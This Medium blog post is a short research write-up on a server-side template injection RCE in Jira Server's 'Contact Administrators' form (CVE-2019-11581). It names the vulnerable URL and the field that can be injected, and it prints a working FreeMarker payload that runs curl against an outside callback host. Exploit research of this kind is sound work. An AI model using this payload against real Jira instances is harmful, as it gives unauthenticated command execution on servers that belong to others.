RCE in Jira(CVE-2019–11581)

ruvlol
ruvlol
Jul 13, 2019 · 2 min read

Hello, community.

So, here I will share info about new critical vulnerability in Jira server. It was not originally found by me. 4 days ago at evening I found a security advisory which claimed that critical security hole existed in Jira. The very next morning I researched and had working exploit.

It wasn’t hard to find a working exploit since Atlassian shared almost all needed info in advisory. It said that “bulk email send“ and “contact Admin” functionalities were affected by server side template injection. “Bulk email send” was immediately discarded since it requires Admin priveledges to exploit. As about next one, “contact Admin”, it is exploitable if these conditions met:

  1. such functionality was turned on. It is turned off by default.
  2. Jira is not covered with ACL, firewall or SSO provider which prevents unauthenticated access.

I installed my own trial Jira, turned “contact Admin” on and started testing.

The “contact Admin” functinality is accessible on this URL:

https://jiraserver/secure/ContactAdministrators!default.jspa

And if invoked from UI, the button is:

Image for post
Image for post

Now let’s figure out the payload. Jira uses freemarker template engine, which I am familiar with. The first thing I tried is insert known payload into all fields.

The payload was:

$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://avtohanter.ru/rcetest?a=a').waitFor()

pasted in contact form:

Image for post
Image for post

Then I immediately received a bunch of curl callbacks on my host, which confirmed the vulnerability.

Image for post
Image for post

Later it turned that only “Subject” field is vulnerable, so you could be more precise with testing.

Hope that will help!

By the way, I have patreon where I am writing infosec articles. If you are interested you can check it out on https://www.patreon.com/ruvlol , I am working hard to make it a good source of ethical hacking exprience, a lot of articles are coming there including research writeups.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch

Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore

Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store